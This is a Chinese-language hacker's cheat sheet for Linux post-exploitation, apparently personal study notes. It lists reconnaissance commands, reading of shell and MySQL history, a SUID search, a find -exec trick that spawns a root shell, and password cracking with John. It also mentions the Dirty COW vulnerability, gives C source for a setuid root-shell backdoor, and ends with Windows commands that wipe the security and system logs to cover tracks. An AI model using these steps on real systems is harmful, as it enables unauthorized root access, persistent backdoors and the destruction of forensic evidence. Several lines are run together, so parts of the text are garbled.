信息收集相关命令
查看内核/系统
uname -a
cat /proc/version
hostnamectl
dmesg | grep Linuxlsb_release -a
redhat 红帽下专用命令
cat /etc/redhat-releasegetconf LONG_BIT 查看操作系统位数
cat /etc/*release 查看linux发行版信息
查看操作记录
cat ~/.zsh_history
cat ~/.mysql_history
dpkg -l nmap 查找软件版本预期状态(最前面的第一个字母)
当前状态(最前面的第二个字母):(i)已安装;(n)未安装
权限
-rwx r-x r-x
-:文件类型(-:文件;d:目录;l:lnk文件 软/硬链接)
rwx:当前用户
r-x:同组用户
r-x:其他用户s权限:在执行该程序的时候,会以文件所有者的权限去执行
root:chmod u+s fileName
- rws --- --- fileNameuser$: ./fileName = root#: ./fileName 普通用户user执行filename的时候等于root执行
提权
find命令:
find / -perm -u=s -type f 2>/dev/null 查找有s权限的文件,将错误输出输出到空栈
sudo -l 看看我们能用sudo执行哪些东西(sudo:以管理员身份运行程序)find 1.txt -exec /bin/bash -p \;(奇怪的操作,先给find赋予s权限,然后利用find的参数-exec去运行bash文件,是以管理员身份去运行)
john 密码爆破工具
echo ajie:SGHLWPbYfiLLg:0:0:sajiea:/root:/bin/bash > pass
john pass
脏牛漏洞
## 脏牛漏洞
编号:CVE-2016-5195
影响范围:2016前十年的linux版本,安卓android
效果:覆盖root用户,重新生成指定用户并且带有特权
在野利用:官方未公布,少数人知道
exp交易:暗网
表层:常规网站
深网:后台等一些看不见的
暗网:需要特殊渠道
简单提权后门
#include<stdio.h>
#include<stdlib.h>
int main(){
setuid(0);
system("/bin/bash -p");
}
清除痕迹
msf:clearev
windows:
wevtutil:
wevtutil el 查看所有日志
wevtutil cl system 清除系统日志
wevtutil cl application 清除应用程序日志
wevtutil cl security 清除安全日志
recent(最近操作记录)
del /f /s /q "%userprofile%\recent\*.\*"